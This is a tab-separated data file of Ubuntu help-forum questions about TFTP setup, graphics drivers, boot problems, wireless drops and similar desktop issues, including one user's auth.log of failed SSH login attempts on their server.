317231	tftpd-hpa + 12.04 lts	i installed the tftp server using sudo apt-get install tftpd-hpa i then created a directory sudo mkdir /home/tftp , changed the owner and permissions sudo chmod 777 /home/tftp sudo chown nobody : nogroup /home/tftp i then changed the /etc/default/tftpd-hpa file and it looks like this : tftp_username= '' tftp '' tftp_directory= '' /home/tftp '' tftp_address= '' 0.0.0.0:69 '' tftp_options= '' -- secure -- create '' i then restarted the service : sudo service tftpd-hpa restart however i am unable to upload or download from the tftp server i verified that the service is running and here is the output of sudo service tftpd-hpa status : tftpd-hpa start/running , process 3117 here are the permissions of the directory : sudo ls -l /home | grep tftp drwxrwxrwx 2 nobody nogroup 4096 jul 6 16:09 tftp any ideas ? your help is much appreciated and thank you in advance !
317233	how to get into steam directory	i 'm trying to add skins into counter strike source but i do n't know where the steam directory is . i also downloaded steam from the ubuntu software center . if anyone knows how to get into please tell me .
317235	backlight indicator not working with nvidia driver	i have a thinkpad t420 with nvidia quadro nvs4200 running binary 319.12 driver . i am using ubuntu 12.04 with cinnamon . the display works fine , and the brightness up/down controls also work in changing the screen brightness . however , the on-screen brightness indicator is wrong . whenever i increase the brightness , the indicator shows a low value , even when the screen is on full brightness ( pictured ) . when i decrease the brightness , no indicator shows up . the problem also affects unity . the backlight indicator never moves beyond this low level , and the indicator only shows when increasing brightness : i think this relates to /sys/class/backlight/ . travis @ travis-thinkpad-ubuntu : ~ $ ls /sys/class/backlight thinkpad_screen travis @ travis-thinkpad-ubuntu : ~ $ cd /sys/class/backlight/thinkpad_screen travis @ travis-thinkpad-ubuntu : /sys/class/backlight/thinkpad_screen $ ls actual_brightness brightness power type bl_power max_brightness subsystem uevent in theory , the file actual_brightness should hold the current brightness value of the display , which is supposedly between 1 and 7 . however , when i run cat actual_brightness the system always returns 0 . maybe this is what the indicator is reading ? i do n't have the usual /sys/class/backlight/acpi_video0/ . is there a way i can get the screen 's real brightness to show up ?
317240	laptop overheating asus k52jc	well since installing ubuntu ( i have 13.04 but it 's the same for any version that i 've tried ) my laptop started getting really hot and slow . usually on windows i could play games for hours and when i used to play wow i played for 5-6 hours straight without too much issues.but now after a few hours of use it starts getting really hot and starts to slow down .sometimes its hot enough to be painful to hold on lap.i have an asus k52jc intel core i3 nvidia 310 and i do have a functioning bumblebee install ( well it works for games ) . usually on windows if the laptop got hot i would just leave it there to sit still turned on and after 10-15 mins it was cold again . now i ca n't do that anymore since even when its just turned on without any applications running in the background i can still hear the fans whirring at almost top speed and after a few hours of use xsensors registers 70 c on both cores . im not an expert on linux but to me atleast it seems that the components are running at 100 % all the time.also i thing its worth to mention my laptop is factory overclocked to + 5 % although its not much of a difference if i switch that option off from bios
317241	can i use ubuntu to diagnose hard drive or ram problems in windows ?	this may be a crazy question , but here goes ... my brother suggested that i could somehow use either a ubuntu live boot cd or flash drive or kubuntu as a way to diagnose issues i 'm currently having with my laptop . i 'm running windows 7 and for some reason my laptop has suddenly started freezing during windows start up . this started immediately after i began seeing the hard drive light remaining on and my computer running very , very slowly - even though when i checked task manager it said that no applications or unusual processes were running at the time and cpu usage was 0 % . strange , i know . i 've used the restore disks 3 times already , thinking maybe it was a virus , even though i run norton 360 and it found nothing upon a full system scan . but every time i end up with windows failing to start up at all , or it getting stuck on the `` windows starting '' screen for at least 15-20 minutes before it starts . i 'm at a total loss here . i 'm thinking it is either a hard drive issue or perhaps a ram issue , but i am a total moron when it comes to the operational aspect of computers . i do n't know where to begin . my brother said that if i used a flash drive of ubuntu or kubuntu and tried to boot from there that i would know immediately if it was my hard drive because it would n't operate . i do n't understand that since it would n't be operating off my hard drive , it would be running from the cd/flash drive . does anyone have any clues on what i can do to check this out ? i 'm tempted to buy a new hard drive and ram , but would hate to buy something i ca n't return if they are n't the issue . i 'm stuck ... any help would be very appreciated . thanks so much and have a wonderful weekend .
317249	ubuntu 12.04.2 hangs during boot on a pink screen , console mode is blank	i 've installed 12.04.2 on a os-less asus b85m-e ( intel core i5-4430 [ lga1150 ] ) . when i boot , it freezes on a 'pink screen ' . alt-ctrl-f1 has no output . i have already reinstalled once . i read in many forum posts that some specific uefi features cause problems with ubuntu and grub and should be disabled before installation . so i disabled fast boot and intel srt , and then reinstalled . secure boot was enabled when i installed a second time . successful reinstallation , same freeze-up on reboot . i 've since confirmed that fast boot , srt and also secure boot are disabled . no change when booting . should i reinstall again ? should i use a later version of ubuntu and the linux kernel ? should i disable anything else ? also , are there any guides on the uefi bios menu for this asus motherboard . it has so many options and many exotic names . the last machine i installed ubuntu ( 12.04 ) on was a celeron laptop , so this is all very fancy . it would be nice to know which options can or can not be used with linux . thanks for your help . ryan
317250	does ubuntu limit connections ?	i want to use a torrent to download some files and on my windows laptop i can get speeds of 1.4mbps ( on average ) , the same was true when i had windows on this desktop machine . however now i am trying to download using ubuntu ( using vuze , though i did try using transmission ) and am only getting speeds of 140kbps max . also no matter what torrent i try it never connects to more than 3 seeds . the port is open ( used three checks ) and is routed to this ubuntu machine . i was wondering if ubuntu limits connections ?
317252	wireless stops working after several minutes	my wireless connection seems to drop out every few minutes . disconnecting and reconnecting will make it work a little while longer . everything still looks fine , but when i try to ping my gateway , i get the following $ ping 192.168.1.1 ping 192.168.1.1 ( 192.168.1.1 ) 56 ( 84 ) bytes of data . from 192.168.1.144 icmp_seq=1 destination host unreachable 192.168.1.1 is my router 's ip and 192.168.1.144 is my machine 's ip . i know that my router is working ( and i 've experienced the same issue on several other networks ) . any suggestions appreciated : )
317255	how can i open terminator with mutiple windows already open	when i run terminator i want it to open up already split vertically 8 time . i want this to be my default layout everytime i open terminator
317256	question about dual boot surface pro with ubuntu	i 'm not sure if i 'm doing something wrong , after i install ubuntu using a usb as suggested through this post , the installation seems to be okay , but when i reboot , it just boot right back into windows ... am i suppose to install the bootloader in a specific place in order for it to boot into it ? am i suppose to somehow install grub first into somewhere so that when surface starts it will know to boot into the grub first ? please help : )
317261	is it possible to make a ext4 external hd completely open ?	i bought a new external hd in order to use it like a usb key to exchange files between different computers , and i formatted it using ext4 the problem is that everytime i upload some files i have to change the permission , in order to edit something with another computer or user , and this way creates me too many problems so i would like to know if there is a way to avoid this and makin the hd totally open by default ? ( sort of how fat allows it )
317262	not allowed sign flashing on screen	having a bit of trouble with ubuntu when i logged in today , i keep getting a grey box with a white circle and line through it ( not allowed sign ? ) flashing up on screen and do n't know what it is supposed to mean . nothing seems to be wrong , i 've just been googling for the last couple of hours trying to find out what it is . can anyone point me in the right direction as to what it is trying to tell me ?
317265	problems using python	i am running ubuntu 12.04 and just installed python 3.2.3 tried to save and run the `` hello world program '' . but it will not run i keep getting a syntax error . how do you run a program in python ? ? ? ? .
317268	cant´t safely remove external hdd	hi i have a new external hdd and when i want to remove it i can unmount it but if i want to use the `` remove it safely '' option it tells that is not possible and gives me this message : error detaching : helper exited with exit code 1 : detaching device /dev/sde usb device : /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2 ) synchronize cache : synchronize cache ( 10 ) : transport : host_status=0x07 [ did_error ] driver_status=0x00 [ driver_ok , suggest_ok ] failed : no such file or directory ( continuing despite synchronize cache failure . ) stop unit : start stop unit : transport : host_status=0x07 [ did_error ] driver_status=0x00 [ driver_ok , suggest_ok ] failed : no such file or directory should i be worried or it isn´t a problem ?
317271	how do i run my bash script on terminator ? or is it even possible ?	so i have this bash script that when i open in terminal it already inputs the words i want so i do n't have to type it in . i was wondering if i can use the same script on terminator and if i can , how ? script : # ! /usr/bin/expect -f spawn -noecho bash expect `` $ `` send `` my custom text '' interact exit can someone help me please ? thanks !
317277	restoring ubuntu 12.04 to install state ( or reinstalling without grub )	i 've been having issues with graphics card drivers that have gotten so complicated that i eventually have to completely reinstall ubuntu to resolve them . however , due to my uefi setup , the ubuntu installer fails after it has already been installed once and leaves my grub install completely unusable ( and sending me into grub rescue upon boot ) , and i have to do a total factory restore to be able to continue . this is not ideal , as i have to reinstall and set up everything on each os i have in use . how can i restore ubuntu to the state that it was in upon install ? if this is not possible , then how can i do a reinstall of ubuntu over the same partition without reinstalling grub ? thanks to anyone who can help .
317280	how do i make alt-tab visually simpler ?	iá¸ż running ubuntu 13.04 . i alt-tab between windows . i can not tell which application will be switched to when i look at the screen . there is too much eye candy , too many glowing shiny bits and the background colors behind the applications change in unpredictable ways . when there are a lot of windows open the icons at the end are slanted instead of flat which is super confusing . is there some setting i can change to restore alt-tab to its previously useful appearance ? is there a theme i can install that will restore alt-tab to its previous simplicity ? i need an alt-tab that has clear icons so that i can easily tell which application is which , and i need a dark border drawn around the currently selected application so that i can figure out what i have switched to . i need all the useless eye candy turned off . subtle visual effects are too hard to see and take too much time to figure out . this behavior used to be available in kde 3 , xfce , gnome 2 , windows xp , is available using the classic theme under windows 7 , and was pioneered on the pre-osx macintosh . can anyone help ?
317282	nvidia x server display configuration - i do n't have any resolution ! ( ubuntu 13.04 )	i have some problems with configuring the resolution of my screen in ubuntu 13.04 . the data of my hardware : acer aspire v3-531g intel b970 processor ( 2.3ghz dual core ) nvidia geforce gt 630m my laptop has optimus technology , hence i use bumblebee for the nvidia driver to work properly . bumblebee is working well , i can tun the optirun command . i start the nvidia settings panel with the command : optirun nvidia-settings -c :8 i saw this method in an other post in this site ( i do n't understand , what does it mean , but after so many troubles with my nvidia-card , i 'm happy that it works ) . as the control panel opens , and i try to change the screen resolution , i 'm unable to do it , because the monitor is n't detected . i do n't have the `` display '' panel , hence i do n't have the possibility to change the resolution . here i link the image : http : //imgur.com/h9zybee & gdocvpu hope you can fix this error ! sincerelly : michael
317290	how ubuntu detects the type of the hardware ?	i see , when i connect a mouse in usb , within seconds my mouse starts woking , similarly for pendrive it is mounted . i just want to know as its the same usb port , how do ubuntu understands what type of device has been connected ? i am asking this question because i have a wimax modem , but ubuntu seems not to get that . if i know how automatically ubuntu gets that , i may be able to manually start the modem . and btw , i just need to know how they are recognized ?
317295	is it just me or were people trying to hack my server ?	is this kind of hacking attempts normal for a regular non-important server ? i just checked my auth.log today . jul 1 15:02:22 webserver sshd [ 5094 ] : did not receive identification string from 188.165.243.46 jul 1 15:03:51 webserver sshd [ 5095 ] : pam_unix ( sshd : auth ) : authentication failure ; logname= uid=0 euid=0 tty=ssh ruser= rhost=iota10.iotanet.net user=root jul 1 15:03:51 webserver sshd [ 5095 ] : pam_winbind ( sshd : auth ) : getting password ( 0x00000388 ) jul 1 15:03:51 webserver sshd [ 5095 ] : pam_winbind ( sshd : auth ) : pam_get_item returned a password jul 1 15:03:51 webserver sshd [ 5095 ] : pam_winbind ( sshd : auth ) : request wbclogonuser failed : wbc_err_auth_error , pam error : pam_user_unknown ( 10 ) , ntstatus : nt_status_no_such_user , error message was : no such user jul 1 15:03:54 webserver sshd [ 5095 ] : failed password for root from 188.165.243.46 port 53281 ssh2 jul 1 15:03:54 webserver sshd [ 5095 ] : received disconnect from 188.165.243.46 : 11 : bye bye [ preauth ] jul 1 16:33:07 webserver sshd [ 5302 ] : invalid user guest from 62.93.6.226 jul 1 16:33:07 webserver sshd [ 5302 ] : input_userauth_request : invalid user guest [ preauth ] jul 1 16:33:07 webserver sshd [ 5302 ] : pam_unix ( sshd : auth ) : check pass ; user unknown jul 1 16:33:07 webserver sshd [ 5302 ] : pam_unix ( sshd : auth ) : authentication failure ; logname= uid=0 euid=0 tty=ssh ruser= rhost=leon.servertools24.de jul 1 16:33:07 webserver sshd [ 5302 ] : pam_winbind ( sshd : auth ) : getting password ( 0x00000388 ) jul 1 16:33:07 webserver sshd [ 5302 ] : pam_winbind ( sshd : auth ) : pam_get_item returned a password jul 1 16:33:09 webserver sshd [ 5302 ] : failed password for invalid user guest from 62.93.6.226 port 59027 ssh2 jul 1 16:33:09 webserver sshd [ 5302 ] : received disconnect from 62.93.6.226 : 11 : bye bye [ preauth ] jul 1 16:33:10 webserver sshd [ 5304 ] : invalid user guest from 62.93.6.226 jul 1 16:33:10 webserver sshd [ 5304 ] : input_userauth_request : invalid user guest [ preauth ] jul 1 16:33:10 webserver sshd [ 5304 ] : pam_unix ( sshd : auth ) : check pass ; user unknown jul 1 16:33:10 webserver sshd [ 5304 ] : pam_unix ( sshd : auth ) : authentication failure ; logname= uid=0 euid=0 tty=ssh ruser= rhost=leon.servertools24.de jul 1 16:33:10 webserver sshd [ 5304 ] : pam_winbind ( sshd : auth ) : getting password ( 0x00000388 ) jul 1 16:33:10 webserver sshd [ 5304 ] : pam_winbind ( sshd : auth ) : pam_get_item returned a password jul 1 16:33:12 webserver sshd [ 5304 ] : failed password for invalid user guest from 62.93.6.226 port 60980 ssh2 jul 1 16:33:13 webserver sshd [ 5304 ] : received disconnect from 62.93.6.226 : 11 : bye bye [ preauth ] jul 1 16:33:14 webserver sshd [ 5306 ] : invalid user guest from 62.93.6.226 jul 1 16:33:14 webserver sshd [ 5306 ] : input_userauth_request : invalid user guest [ preauth ] jul 1 16:33:14 webserver sshd [ 5306 ] : pam_unix ( sshd : auth ) : check pass ; user unknown jul 1 16:33:14 webserver sshd [ 5306 ] : pam_unix ( sshd : auth ) : authentication failure ; logname= uid=0 euid=0 tty=ssh ruser= rhost=leon.servertools24.de jul 1 16:33:14 webserver sshd [ 5306 ] : pam_winbind ( sshd : auth ) : getting password ( 0x00000388 ) jul 1 16:33:14 webserver sshd [ 5306 ] : pam_winbind ( sshd : auth ) : pam_get_item returned a password jul 1 16:33:16 webserver sshd [ 5306 ] : failed password for invalid user guest from 62.93.6.226 port 34999 ssh2 jul 1 16:33:16 webserver sshd [ 5306 ] : received disconnect from 62.93.6.226 : 11 : bye bye [ preauth ] jul 1 16:33:17 webserver sshd [ 5308 ] : invalid user test from 62.93.6.226 jul 1 16:33:17 webserver sshd [ 5308 ] : input_userauth_request : invalid user test [ preauth ] jul 1 16:33:17 webserver sshd [ 5308 ] : pam_unix ( sshd : auth ) : check pass ; user unknown jul 1 16:33:17 webserver sshd [ 5308 ] : pam_unix ( sshd : auth ) : authentication failure ; logname= uid=0 euid=0 tty=ssh ruser= rhost=leon.servertools24.de jul 1 16:33:17 webserver sshd [ 5308 ] : pam_winbind ( sshd : auth ) : getting password ( 0x00000388 ) jul 1 16:33:17 webserver sshd [ 5308 ] : pam_winbind ( sshd : auth ) : pam_get_item returned a password jul 1 16:33:19 webserver sshd [ 5308 ] : failed password for invalid user test from 62.93.6.226 port 36760 ssh2 jul 1 16:33:19 webserver sshd [ 5308 ] : received disconnect from 62.93.6.226 : 11 : bye bye [ preauth ] jul 1 16:33:20 webserver sshd [ 5310 ] : invalid user test from 62.93.6.226 jul 1 16:33:20 webserver sshd [ 5310 ] : input_userauth_request : invalid user test [ preauth ] jul 1 16:33:20 webserver sshd [ 5310 ] : pam_unix ( sshd : auth ) : check pass ; user unknown jul 1 16:33:20 webserver sshd [ 5310 ] : pam_unix ( sshd : auth ) : authentication failure ; logname= uid=0 euid=0 tty=ssh ruser= rhost=leon.servertools24.de jul 1 16:33:20 webserver sshd [ 5310 ] : pam_winbind ( sshd : auth ) : getting password ( 0x00000388 ) jul 1 16:33:20 webserver sshd [ 5310 ] : pam_winbind ( sshd : auth ) : pam_get_item returned a password jul 1 16:33:22 webserver sshd [ 5310 ] : failed password for invalid user test from 62.93.6.226 port 38595 ssh2 jul 1 16:33:22 webserver sshd [ 5310 ] : received disconnect from 62.93.6.226 : 11 : bye bye [ preauth ] jul 1 16:33:23 webserver sshd [ 5312 ] : invalid user test from 62.93.6.226 jul 1 16:33:23 webserver sshd [ 5312 ] : input_userauth_request : invalid user test [ preauth ] jul 1 16:33:23 webserver sshd [ 5312 ] : pam_unix ( sshd : auth ) : check pass ; user unknown jul 1 16:33:23 webserver sshd [ 5312 ] : pam_unix ( sshd : auth ) : authentication failure ; logname= uid=0 euid=0 tty=ssh ruser= rhost=leon.servertools24.de jul 1 16:33:23 webserver sshd [ 5312 ] : pam_winbind ( sshd : auth ) : getting password ( 0x00000388 ) jul 1 16:33:23 webserver sshd [ 5312 ] : pam_winbind ( sshd : auth ) : pam_get_item returned a password jul 1 16:33:26 webserver sshd [ 5312 ] : failed password for invalid user test from 62.93.6.226 port 40238 ssh2 jul 1 16:33:26 webserver sshd [ 5312 ] : received disconnect from 62.93.6.226 : 11 : bye bye [ preauth ] jul 1 16:33:27 webserver sshd [ 5314 ] : pam_unix ( sshd : auth ) : authentication failure ; logname= uid=0 euid=0 tty=ssh ruser= rhost=leon.servertools24.de user=ftp jul 1 16:33:27 webserver sshd [ 5314 ] : pam_winbind ( sshd : auth ) : getting password ( 0x00000388 ) jul 1 16:33:27 webserver sshd [ 5314 ] : pam_winbind ( sshd : auth ) : pam_get_item returned a password jul 1 16:33:27 webserver sshd [ 5314 ] : pam_winbind ( sshd : auth ) : request wbclogonuser failed : wbc_err_auth_error , pam error : pam_user_unknown ( 10 ) , ntstatus : nt_status_no_such_user , error message was : no such user jul 1 16:33:29 webserver sshd [ 5314 ] : failed password for ftp from 62.93.6.226 port 42089 ssh2 jul 1 16:33:29 webserver sshd [ 5314 ] : received disconnect from 62.93.6.226 : 11 : bye bye [ preauth ] jul 1 16:33:30 webserver sshd [ 5316 ] : pam_unix ( sshd : auth ) : authentication failure ; logname= uid=0 euid=0 tty=ssh ruser= rhost=leon.servertools24.de user=ftp jul 1 16:33:30 webserver sshd [ 5316 ] : pam_winbind ( sshd : auth ) : getting password ( 0x00000388 ) jul 1 16:33:30 webserver sshd [ 5316 ] : pam_winbind ( sshd : auth ) : pam_get_item returned a password jul 1 16:33:30 webserver sshd [ 5316 ] : pam_winbind ( sshd : auth ) : request wbclogonuser failed : wbc_err_auth_error , pam error : pam_user_unknown ( 10 ) , ntstatus : nt_status_no_such_user , error message was : no such user jul 1 16:33:32 webserver sshd [ 5316 ] : failed password for ftp from 62.93.6.226 port 43379 ssh2 jul 1 16:33:32 webserver sshd [ 5316 ] : received disconnect from 62.93.6.226 : 11 : bye bye [ preauth ] jul 1 16:33:33 webserver sshd [ 5318 ] : pam_unix ( sshd : auth ) : authentication failure ; logname= uid=0 euid=0 tty=ssh ruser= rhost=leon.servertools24.de user=ftp jul 1 16:33:33 webserver sshd [ 5318 ] : pam_winbind ( sshd : auth ) : getting password ( 0x00000388 ) jul 1 16:33:33 webserver sshd [ 5318 ] : pam_winbind ( sshd : auth ) : pam_get_item returned a password jul 1 16:33:33 webserver sshd [ 5318 ] : pam_winbind ( sshd : auth ) : request wbclogonuser failed : wbc_err_auth_error , pam error : pam_user_unknown ( 10 ) , ntstatus : nt_status_no_such_user , error message was : no such user jul 1 16:33:35 webserver sshd [ 5318 ] : failed password for ftp from 62.93.6.226 port 44670 ssh2 jul 1 16:33:35 webserver sshd [ 5318 ] : received disconnect from 62.93.6.226 : 11 : bye bye [ preauth ] jul 1 16:33:36 webserver sshd [ 5320 ] : invalid user ftpuser from 62.93.6.226 jul 1 16:33:36 webserver sshd [ 5320 ] : input_userauth_request : invalid user ftpuser [ preauth ] jul 1 16:33:36 webserver sshd [ 5320 ] : pam_unix ( sshd : auth ) : check pass ; user unknown jul 1 16:33:36 webserver sshd [ 5320 ] : pam_unix ( sshd : auth ) : authentication failure ; logname= uid=0 euid=0 tty=ssh ruser= rhost=leon.servertools24.de jul 1 16:33:36 webserver sshd [ 5320 ] : pam_winbind ( sshd : auth ) : getting password ( 0x00000388 ) jul 1 16:33:36 webserver sshd [ 5320 ] : pam_winbind ( sshd : auth ) : pam_get_item returned a password jul 1 16:33:38 webserver sshd [ 5320 ] : failed password for invalid user ftpuser from 62.93.6.226 port 46318 ssh2 jul 1 16:33:38 webserver sshd [ 5320 ] : received disconnect from 62.93.6.226 : 11 : bye bye [ preauth ] jul 1 16:33:39 webserver sshd [ 5322 ] : invalid user ftpuser from 62.93.6.226 jul 1 16:33:39 webserver sshd [ 5322 ] : input_userauth_request : invalid user ftpuser [ preauth ] jul 1 16:33:39 webserver sshd [ 5322 ] : pam_unix ( sshd : auth ) : check pass ; user unknown jul 1 16:33:39 webserver sshd [ 5322 ] : pam_unix ( sshd : auth ) : authentication failure ; logname= uid=0 euid=0 tty=ssh ruser= rhost=leon.servertools24.de jul 1 16:33:39 webserver sshd [ 5322 ] : pam_winbind ( sshd : auth ) : getting password ( 0x00000388 ) jul 1 16:33:39 webserver sshd [ 5322 ] : pam_winbind ( sshd : auth ) : pam_get_item returned a password jul 1 16:33:41 webserver sshd [ 5322 ] : failed password for invalid user ftpuser from 62.93.6.226 port 47653 ssh2 jul 1 16:33:41 webserver sshd [ 5322 ] : received disconnect from 62.93.6.226 : 11 : bye bye [ preauth ] jul 1 16:33:43 webserver sshd [ 5324 ] : invalid user ftpuser from 62.93.6.226 jul 1 16:33:43 webserver sshd [ 5324 ] : input_userauth_request : invalid user ftpuser [ preauth ] jul 1 16:33:43 webserver sshd [ 5324 ] : pam_unix ( sshd : auth ) : check pass ; user unknown jul 1 16:33:43 webserver sshd [ 5324 ] : pam_unix ( sshd : auth ) : authentication failure ; logname= uid=0 euid=0 tty=ssh ruser= rhost=leon.servertools24.de jul 1 16:33:43 webserver sshd [ 5324 ] : pam_winbind ( sshd : auth ) : getting password ( 0x00000388 ) jul 1 16:33:43 webserver sshd [ 5324 ] : pam_winbind ( sshd : auth ) : pam_get_item returned a password jul 1 16:33:45 webserver sshd [ 5324 ] : failed password for invalid user ftpuser from 62.93.6.226 port 49269 ssh2 jul 1 16:33:45 webserver sshd [ 5324 ] : received disconnect from 62.93.6.226 : 11 : bye bye [ preauth ] jul 1 16:33:46 webserver sshd [ 5326 ] : invalid user library from 62.93.6.226 jul 1 16:33:46 webserver sshd [ 5326 ] : input_userauth_request : invalid user library [ preauth ] jul 1 16:33:46 webserver sshd [ 5326 ] : pam_unix ( sshd : auth ) : check pass ; user unknown jul 1 16:33:46 webserver sshd [ 5326 ] : pam_unix ( sshd : auth ) : authentication failure ; logname= uid=0 euid=0 tty=ssh ruser= rhost=leon.servertools24.de jul 1 16:33:46 webserver sshd [ 5326 ] : pam_winbind ( sshd : auth ) : getting password ( 0x00000388 ) jul 1 16:33:46 webserver sshd [ 5326 ] : pam_winbind ( sshd : auth ) : pam_get_item returned a password jul 1 16:33:48 webserver sshd [ 5326 ] : failed password for invalid user library from 62.93.6.226 port 50591 ssh2 jul 1 16:33:48 webserver sshd [ 5326 ] : received disconnect from 62.93.6.226 : 11 : bye bye [ preauth ] jul 1 16:33:49 webserver sshd [ 5328 ] : invalid user library from 62.93.6.226 jul 1 16:33:49 webserver sshd [ 5328 ] : input_userauth_request : invalid user library [ preauth ] jul 1 16:33:49 webserver sshd [ 5328 ] : pam_unix ( sshd : auth ) : check pass ; user unknown jul 1 16:33:49 webserver sshd [ 5328 ] : pam_unix ( sshd : auth ) : authentication failure ; logname= uid=0 euid=0 tty=ssh ruser= rhost=leon.servertools24.de jul 1 16:33:49 webserver sshd [ 5328 ] : pam_winbind ( sshd : auth ) : getting password ( 0x00000388 ) jul 1 16:33:49 webserver sshd [ 5328 ] : pam_winbind ( sshd : auth ) : pam_get_item returned a password jul 1 16:33:51 webserver sshd [ 5328 ] : failed password for invalid user library from 62.93.6.226 port 51906 ssh2 jul 1 16:33:51 webserver sshd [ 5328 ] : received disconnect from 62.93.6.226 : 11 : bye bye [ preauth ] jul 1 16:33:52 webserver sshd [ 5330 ] : invalid user library from 62.93.6.226 jul 1 16:33:52 webserver sshd [ 5330 ] : input_userauth_request : invalid user library [ preauth ] jul 1 16:33:52 webserver sshd [ 5330 ] : pam_unix ( sshd : auth ) : check pass ; user unknown jul 1 16:33:52 webserver sshd [ 5330 ] : pam_unix ( sshd : auth ) : authentication failure ; logname= uid=0 euid=0 tty=ssh ruser= rhost=leon.servertools24.de jul 1 16:33:52 webserver sshd [ 5330 ] : pam_winbind ( sshd : auth ) : getting password ( 0x00000388 ) jul 1 16:33:52 webserver sshd [ 5330 ] : pam_winbind ( sshd : auth ) : pam_get_item returned a password jul 1 16:33:54 webserver sshd [ 5330 ] : failed password for invalid user library from 62.93.6.226 port 53246 ssh2 jul 1 16:33:55 webserver sshd [ 5330 ] : received disconnect from 62.93.6.226 : 11 : bye bye [ preauth ] jul 1 16:33:56 webserver sshd [ 5332 ] : pam_unix ( sshd : auth ) : authentication failure ; logname= uid=0 euid=0 tty=ssh ruser= rhost=leon.servertools24.de user=mysql jul 1 16:33:56 webserver sshd [ 5332 ] : pam_winbind ( sshd : auth ) : getting password ( 0x00000388 ) jul 1 16:33:56 webserver sshd [ 5332 ] : pam_winbind ( sshd : auth ) : pam_get_item returned a password jul 1 16:33:56 webserver sshd [ 5332 ] : pam_winbind ( sshd : auth ) : request wbclogonuser failed : wbc_err_auth_error , pam error : pam_user_unknown ( 10 ) , ntstatus : nt_status_no_such_user , error message was : no such user jul 1 16:33:58 webserver sshd [ 5332 ] : failed password for mysql from 62.93.6.226 port 54760 ssh2 jul 1 16:33:58 webserver sshd [ 5332 ] : received disconnect from 62.93.6.226 : 11 : bye bye [ preauth ] jul 1 16:33:59 webserver sshd [ 5334 ] : pam_unix ( sshd : auth ) : authentication failure ; logname= uid=0 euid=0 tty=ssh ruser= rhost=leon.servertools24.de user=mysql jul 1 16:33:59 webserver sshd [ 5334 ] : pam_winbind ( sshd : auth ) : getting password ( 0x00000388 ) jul 1 16:33:59 webserver sshd [ 5334 ] : pam_winbind ( sshd : auth ) : pam_get_item returned a password jul 1 16:33:59 webserver sshd [ 5334 ] : pam_winbind ( sshd : auth ) : request wbclogonuser failed : wbc_err_auth_error , pam error : pam_user_unknown ( 10 ) , ntstatus : nt_status_no_such_user , error message was : no such user jul 1 16:34:02 webserver sshd [ 5334 ] : failed password for mysql from 62.93.6.226 port 56357 ssh2 jul 1 16:34:02 webserver sshd [ 5334 ] : received disconnect from 62.93.6.226 : 11 : bye bye [ preauth ] jul 1 16:34:03 webserver sshd [ 5336 ] : pam_unix ( sshd : auth ) : authentication failure ; logname= uid=0 euid=0 tty=ssh ruser= rhost=leon.servertools24.de user=mysql jul 1 16:34:03 webserver sshd [ 5336 ] : pam_winbind ( sshd : auth ) : getting password ( 0x00000388 ) jul 1 16:34:03 webserver sshd [ 5336 ] : pam_winbind ( sshd : auth ) : pam_get_item returned a password jul 1 16:34:03 webserver sshd [ 5336 ] : pam_winbind ( sshd : auth ) : request wbclogonuser failed : wbc_err_auth_error , pam error : pam_user_unknown ( 10 ) , ntstatus : nt_status_no_such_user , error message was : no such user jul 1 16:34:05 webserver sshd [ 5336 ] : failed password for mysql from 62.93.6.226 port 58251 ssh2 jul 1 16:34:05 webserver sshd [ 5336 ] : received disconnect from 62.93.6.226 : 11 : bye bye [ preauth ] jul 1 16:34:06 webserver sshd [ 5338 ] : invalid user support from 62.93.6.226 jul 1 16:34:06 webserver sshd [ 5338 ] : input_userauth_request : invalid user support [ preauth ] jul 1 16:34:06 webserver sshd [ 5338 ] : pam_unix ( sshd : auth ) : check pass ; user unknown jul 1 16:34:06 webserver sshd [ 5338 ] : pam_unix ( sshd : auth ) : authentication failure ; logname= uid=0 euid=0 tty=ssh ruser= rhost=leon.servertools24.de jul 1 16:34:06 webserver sshd [ 5338 ] : pam_winbind ( sshd : auth ) : getting password ( 0x00000388 ) jul 1 16:34:06 webserver sshd [ 5338 ] : pam_winbind ( sshd : auth ) : pam_get_item returned a password jul 1 16:34:08 webserver sshd [ 5338 ] : failed password for invalid user support from 62.93.6.226 port 59741 ssh2 jul 1 16:34:08 webserver sshd [ 5338 ] : received disconnect from 62.93.6.226 : 11 : bye bye [ preauth ] jul 1 16:34:10 webserver sshd [ 5340 ] : invalid user support from 62.93.6.226 jul 1 16:34:10 webserver sshd [ 5340 ] : input_userauth_request : invalid user support [ preauth ] jul 1 16:34:10 webserver sshd [ 5340 ] : pam_unix ( sshd : auth ) : check pass ; user unknown jul 1 16:34:10 webserver sshd [ 5340 ] : pam_unix ( sshd : auth ) : authentication failure ; logname= uid=0 euid=0 tty=ssh ruser= rhost=leon.servertools24.de jul 1 16:34:10 webserver sshd [ 5340 ] : pam_winbind ( sshd : auth ) : getting password ( 0x00000388 ) jul 1 16:34:10 webserver sshd [ 5340 ] : pam_winbind ( sshd : auth ) : pam_get_item returned a password jul 1 16:34:12 webserver sshd [ 5340 ] : failed password for invalid user support from 62.93.6.226 port 33112 ssh2
317297	compare files script	i am using this script to find information stored in one file using other file as a source for variables to look for : # ! /bin/bash clear file=/home/victor/documentos/temporal/13-06-04_cuentas_para_revisar_cajas.txt while ifs= read -r line do echo $ line cat inventory.csv | grep `` $ line '' > > cuentasxcajas.txt done < $ file echo `` done '' but the file cuentasxcajas.txt is empty , any suggestions ?
317306	wireless lan not working on asusx71vn	i 'm using ubuntu 12.04 32bit on asus-x71vn ultra-book . wifi is working . but wifi light ( indicator ) works even switch on or switch off . wifi light is `` on '' at ubuntu boot animation . after , i ca n't off light by switching . but laptop switch is working . there also is n't a bluetooth applet in the top panel . please help me ! network controller [ 0280 ] : atheros communications inc. ar928x wireless network adapter ( pci-express ) [ 168c:002a ] ( rev 01 ) subsystem : azurewave aw-ne771 802.11bgn wireless mini pcie card [ ar9281 ] [ 1a3b:1067 ] kernel driver in use : ath9k
317309	alternative to software for windows phone	i just installed ubuntu 12.10 lts on my computer . however i have one problem . i use a nokia lumia 610 phone and therefore the os is windows phone . in order to transfer songs , pictures etc . usually when using windows i can use zune software , however in ubuntu this software does n't work in wine . when i connect the phone to a usb port on my computer , the computer detects the phone as a music device , but there are no files at all displayed is there any alternative for zune in ubuntu so that i can transfer songs , etc . to my cellphone ?
